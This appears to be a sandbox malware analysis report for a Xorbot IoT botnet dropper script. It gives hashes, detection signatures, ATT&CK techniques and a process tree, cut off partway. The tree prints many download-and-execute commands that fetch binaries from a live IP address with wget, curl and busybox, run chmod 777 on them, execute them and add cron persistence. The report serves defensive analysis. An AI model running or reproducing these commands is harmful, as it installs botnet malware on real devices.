xorbot | a6be12c3c8dd2355975f18dbeb450c1130df50f893548282b427c4933e1f15cf

Resubmissions

03/04/2025, 22:32

250403-2fxrbayjy3 10

03/04/2025, 22:30

250403-2fa8bayjx3 10

Analysis

max time kernel
299s
max time network
298s
platform
ubuntu-24.04_amd64
resource
ubuntu2404-amd64-20250307-en
resource tags

arch:amd64arch:i386image:ubuntu2404-amd64-20250307-enkernel:6.8.0-31-genericlocale:en-usos:ubuntu-24.04-amd64system
submitted
03/04/2025, 22:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

2d3354e4454c0aa1442c15ae4db570d7
SHA1

fa41bc59a61d70fed29d83a9fadcaf5f29a0306c
SHA256

a6be12c3c8dd2355975f18dbeb450c1130df50f893548282b427c4933e1f15cf
SHA512

95586720bce8db9d47b64c0e4555ba8d6dbc2899295a18ef6cd7f80558ee39e4088f3b66a22e49846ab83dc5d6a5a07604f5b0ed412b9b40a3ff9867498d8e09
SSDEEP

192:vT3jmvfO3m3C3x3+3e35BNkJpg35J5B5uFpYb+2va224Gm6eQmp9lLWLqLzm+B+k:vT3jmvfO3m3C3x3+3e35BNkJpg3bvJb7

Score

10^/10

xorbot botnet defense_evasion discovery execution persistence privilege_escalation rootkit trojan

Malware Config

Signatures

Detects Xorbot 3 IoCs

botnet trojan

resource	yara_rule
behavioral9/files/fstream-1.dat	family_xorbot
behavioral9/files/fstream-3.dat	family_xorbot
behavioral9/files/fstream-5.dat	family_xorbot

Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
botnet trojan xorbot
Xorbot family
xorbot

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
3607	chmod
3614	chmod
3635	chmod
3682	chmod
3696	chmod
3727	chmod
3668	chmod
3586	chmod
3601	chmod
3628	chmod
3641	chmod
3689	chmod
3720	chmod
3734	chmod
3572	chmod
3655	chmod
3675	chmod
3747	chmod
3761	chmod
3768	chmod
3774	chmod
3781	chmod
3579	chmod
3621	chmod
3648	chmod
3662	chmod
3741	chmod
3754	chmod

Executes dropped EXE 27 IoCs

ioc	pid	Process
/tmp/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G	3573	bins.sh
/tmp/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv	3580	bins.sh
/tmp/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E	3587	bins.sh
/tmp/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr	3608	bins.sh
/tmp/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX	3615	bins.sh
/tmp/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA	3622	bins.sh
/tmp/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q	3629	bins.sh
/tmp/wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR	3636	bins.sh
/tmp/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75	3642	bins.sh
/tmp/j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f	3649	bins.sh
/tmp/7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa	3656	bins.sh
/tmp/qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb	3663	bins.sh
/tmp/ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q	3669	bins.sh
/tmp/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75	3676	bins.sh
/tmp/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA	3683	bins.sh
/tmp/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q	3690	bins.sh
/tmp/wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR	3697	bins.sh
/tmp/ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q	3721	bins.sh
/tmp/j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f	3728	bins.sh
/tmp/7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa	3735	bins.sh
/tmp/qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb	3742	bins.sh
/tmp/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki	3748	bins.sh
/tmp/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G	3755	bins.sh
/tmp/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv	3762	bins.sh
/tmp/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E	3769	bins.sh
/tmp/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX	3775	bins.sh
/tmp/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr	3782	bins.sh

Loads a kernel module 14 IoCs

Loads a Linux kernel module, potentially to achieve persistence

rootkit

pid	Process
3587	l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
3587	l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
3593	l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
3593	l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
3593	l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
3593	l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
3593	l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
3593	l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
3593	l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
3593	l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
3593	l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
3593	l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
3593	l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
3593	l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalation

Cron

T1053.003

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.FH21HC	crontab

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 10 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
3604	wget
3606	busybox
3608	z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
3778	wget
3779	curl
3780	busybox
3784	rm
3605	curl
3610	rm
3782	z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr

Writes file to tmp directory 48 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f	curl
File opened for modification	/tmp/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA	wget
File opened for modification	/tmp/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q	wget
File opened for modification	/tmp/7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa	wget
File opened for modification	/tmp/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki	curl
File opened for modification	/tmp/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv	wget
File opened for modification	/tmp/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv	curl
File opened for modification	/tmp/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G	wget
File opened for modification	/tmp/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX	wget
File opened for modification	/tmp/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q	wget
File opened for modification	/tmp/qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb	wget
File opened for modification	/tmp/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E	wget
File opened for modification	/tmp/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA	curl
File opened for modification	/tmp/qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb	curl
File opened for modification	/tmp/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75	curl
File opened for modification	/tmp/j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f	wget
File opened for modification	/tmp/j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f	curl
File opened for modification	/tmp/7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa	curl
File opened for modification	/tmp/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G	wget
File opened for modification	/tmp/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E	curl
File opened for modification	/tmp/wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR	curl
File opened for modification	/tmp/wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR	wget
File opened for modification	/tmp/qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb	curl
File opened for modification	/tmp/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki	wget
File opened for modification	/tmp/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E	curl
File opened for modification	/tmp/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr	curl
File opened for modification	/tmp/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G	curl
File opened for modification	/tmp/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv	wget
File opened for modification	/tmp/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX	curl
File opened for modification	/tmp/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75	wget
File opened for modification	/tmp/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q	curl
File opened for modification	/tmp/ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q	curl
File opened for modification	/tmp/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G	curl
File opened for modification	/tmp/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr	wget
File opened for modification	/tmp/ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q	wget
File opened for modification	/tmp/ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q	curl
File opened for modification	/tmp/wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR	curl
File opened for modification	/tmp/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr	wget
File opened for modification	/tmp/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA	curl
File opened for modification	/tmp/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv	curl
File opened for modification	/tmp/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E	wget
File opened for modification	/tmp/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q	curl
File opened for modification	/tmp/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75	curl
File opened for modification	/tmp/qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb	wget
File opened for modification	/tmp/ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q	wget
File opened for modification	/tmp/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX	curl
File opened for modification	/tmp/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr	curl
File opened for modification	/tmp/7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa	curl

cURL User-Agent 27 IoCs

Uses User-Agent string associated with cURL utility.

description	flow	ioc
HTTP User-Agent header	11	curl/8.5.0
HTTP User-Agent header	21	curl/8.5.0
HTTP User-Agent header	23	curl/8.5.0
HTTP User-Agent header	31	curl/8.5.0
HTTP User-Agent header	33	curl/8.5.0
HTTP User-Agent header	35	curl/8.5.0
HTTP User-Agent header	42	curl/8.5.0
HTTP User-Agent header	50	curl/8.5.0
HTTP User-Agent header	3	curl/8.5.0
HTTP User-Agent header	27	curl/8.5.0
HTTP User-Agent header	29	curl/8.5.0
HTTP User-Agent header	37	curl/8.5.0
HTTP User-Agent header	39	curl/8.5.0
HTTP User-Agent header	44	curl/8.5.0
HTTP User-Agent header	54	curl/8.5.0
HTTP User-Agent header	17	curl/8.5.0
HTTP User-Agent header	19	curl/8.5.0
HTTP User-Agent header	52	curl/8.5.0
HTTP User-Agent header	56	curl/8.5.0
HTTP User-Agent header	5	curl/8.5.0
HTTP User-Agent header	7	curl/8.5.0
HTTP User-Agent header	13	curl/8.5.0
HTTP User-Agent header	15	curl/8.5.0
HTTP User-Agent header	25	curl/8.5.0
HTTP User-Agent header	41	curl/8.5.0
HTTP User-Agent header	46	curl/8.5.0
HTTP User-Agent header	48	curl/8.5.0

/tmp/bins.sh
/tmp/bins.sh
1⤵
- Executes dropped EXE
PID:3563
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:3565
- /usr/bin/wget
  wget http://77.90.153.218/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
  2⤵
  - Writes file to tmp directory
  PID:3566
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:3570
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
  2⤵
  PID:3571
- /usr/bin/chmod
  chmod 777 tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
  2⤵
  - File and Directory Permissions Modification
  PID:3572
- /tmp/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
  ./tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
  2⤵
  PID:3573
- /usr/bin/rm
  rm tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
  2⤵
  PID:3575
- /usr/bin/wget
  wget http://77.90.153.218/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
  2⤵
  - Writes file to tmp directory
  PID:3576
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:3577
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
  2⤵
  PID:3578
- /usr/bin/chmod
  chmod 777 59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
  2⤵
  - File and Directory Permissions Modification
  PID:3579
- /tmp/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
  ./59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
  2⤵
  PID:3580
- /usr/bin/rm
  rm 59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
  2⤵
  PID:3582
- /usr/bin/wget
  wget http://77.90.153.218/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
  2⤵
  - Writes file to tmp directory
  PID:3583
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:3584
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
  2⤵
  PID:3585
- /usr/bin/chmod
  chmod 777 l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
  2⤵
  - File and Directory Permissions Modification
  PID:3586
- /tmp/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
  ./l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
  2⤵
  - Loads a kernel module
  PID:3587
- - /usr/bin/crontab
    crontab -l
    3⤵
    PID:3590
- - /usr/bin/crontab
    crontab -
    3⤵
    - Creates/modifies Cron job
    PID:3592
- /usr/bin/rm
  rm l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
  2⤵
  PID:3596
- /usr/bin/wget
  wget http://77.90.153.218/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
  2⤵
  PID:3598
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
  2⤵
  - Reads runtime system information
  PID:3599
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
  2⤵
  PID:3600
- /usr/bin/chmod
  chmod 777 1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
  2⤵
  - File and Directory Permissions Modification
  PID:3601
- /tmp/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
  ./1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
  2⤵
  PID:3602
- /usr/bin/rm
  rm 1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
  2⤵
  PID:3603
- /usr/bin/wget
  wget http://77.90.153.218/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:3604
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:3605
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
  2⤵
  - System Network Configuration Discovery
  PID:3606
- /usr/bin/chmod
  chmod 777 z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
  2⤵
  - File and Directory Permissions Modification
  PID:3607
- /tmp/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
  ./z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
  2⤵
  - System Network Configuration Discovery
  PID:3608
- /usr/bin/rm
  rm z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
  2⤵
  - System Network Configuration Discovery
  PID:3610
- /usr/bin/wget
  wget http://77.90.153.218/bins/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX
  2⤵
  - Writes file to tmp directory
  PID:3611
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:3612
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX
  2⤵
  PID:3613
- /usr/bin/chmod
  chmod 777 kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX
  2⤵
  - File and Directory Permissions Modification
  PID:3614
- /tmp/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX
  ./kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX
  2⤵
  PID:3615
- /usr/bin/rm
  rm kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX
  2⤵
  PID:3617
- /usr/bin/wget
  wget http://77.90.153.218/bins/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
  2⤵
  PID:3618
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:3619
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
  2⤵
  PID:3620
- /usr/bin/chmod
  chmod 777 MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
  2⤵
  - File and Directory Permissions Modification
  PID:3621
- /tmp/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
  ./MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
  2⤵
  PID:3622
- /usr/bin/rm
  rm MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
  2⤵
  PID:3624
- /usr/bin/wget
  wget http://77.90.153.218/bins/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q
  2⤵
  - Writes file to tmp directory
  PID:3625
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:3626
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q
  2⤵
  PID:3627
- /usr/bin/chmod
  chmod 777 y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q
  2⤵
  - File and Directory Permissions Modification
  PID:3628
- /tmp/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q
  ./y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q
  2⤵
  PID:3629
- /usr/bin/rm
  rm y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q
  2⤵
  PID:3631
- /usr/bin/wget
  wget http://77.90.153.218/bins/wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR
  2⤵
  PID:3632
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:3633
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR
  2⤵
  PID:3634
- /usr/bin/chmod
  chmod 777 wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR
  2⤵
  - File and Directory Permissions Modification
  PID:3635
- /tmp/wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR
  ./wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR
  2⤵
  PID:3636
- /usr/bin/rm
  rm wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR
  2⤵
  PID:3637
- /usr/bin/wget
  wget http://77.90.153.218/bins/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  2⤵
  PID:3638
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:3639
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  2⤵
  PID:3640
- /usr/bin/chmod
  chmod 777 MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  2⤵
  - File and Directory Permissions Modification
  PID:3641
- /tmp/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  ./MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  2⤵
  PID:3642
- /usr/bin/rm
  rm MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  2⤵
  PID:3644
- /usr/bin/wget
  wget http://77.90.153.218/bins/j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f
  2⤵
  PID:3645
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:3646
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f
  2⤵
  PID:3647
- /usr/bin/chmod
  chmod 777 j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f
  2⤵
  - File and Directory Permissions Modification
  PID:3648
- /tmp/j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f
  ./j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f
  2⤵
  PID:3649
- /usr/bin/rm
  rm j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f
  2⤵
  PID:3651
- /usr/bin/wget
  wget http://77.90.153.218/bins/7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa
  2⤵
  PID:3652
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:3653
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa
  2⤵
  PID:3654
- /usr/bin/chmod
  chmod 777 7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa
  2⤵
  - File and Directory Permissions Modification
  PID:3655
- /tmp/7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa
  ./7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa
  2⤵
  PID:3656
- /usr/bin/rm
  rm 7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa
  2⤵
  PID:3658
- /usr/bin/wget
  wget http://77.90.153.218/bins/qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb
  2⤵
  - Writes file to tmp directory
  PID:3659
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:3660
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb
  2⤵
  PID:3661
- /usr/bin/chmod
  chmod 777 qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb
  2⤵
  - File and Directory Permissions Modification
  PID:3662
- /tmp/qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb
  ./qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb
  2⤵
  PID:3663
- /usr/bin/rm
  rm qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb
  2⤵
  PID:3664
- /usr/bin/wget
  wget http://77.90.153.218/bins/ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q
  2⤵
  - Writes file to tmp directory
  PID:3665
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:3666
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q
  2⤵
  PID:3667
- /usr/bin/chmod
  chmod 777 ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q
  2⤵
  - File and Directory Permissions Modification
  PID:3668
- /tmp/ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q
  ./ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q
  2⤵
  PID:3669
- /usr/bin/rm
  rm ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q
  2⤵
  PID:3671
- /usr/bin/wget
  wget http://77.90.153.218/bins/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  2⤵
  - Writes file to tmp directory
  PID:3672
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:3673
- /bin/busybox
  /bin/busybox wget http://77.90.153.218/bins/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  2⤵
  PID:3674
- /usr/bin/chmod
  chmod 777 MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  2⤵
  - File and Directory Permissions Modification
  PID:3675
- /tmp/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  ./MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  2⤵
  PID:3676
- /usr/bin/rm
  rm MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  2⤵
  PID:3678
- /usr/bin/wget
  wget http://77.90.153.218/bins/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
  2⤵
  - Writes file to tmp directory
  PID:3679
- /usr/bin/curl
  curl -O http://77.90.153.218/bins/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:3680
- /bin/busybox
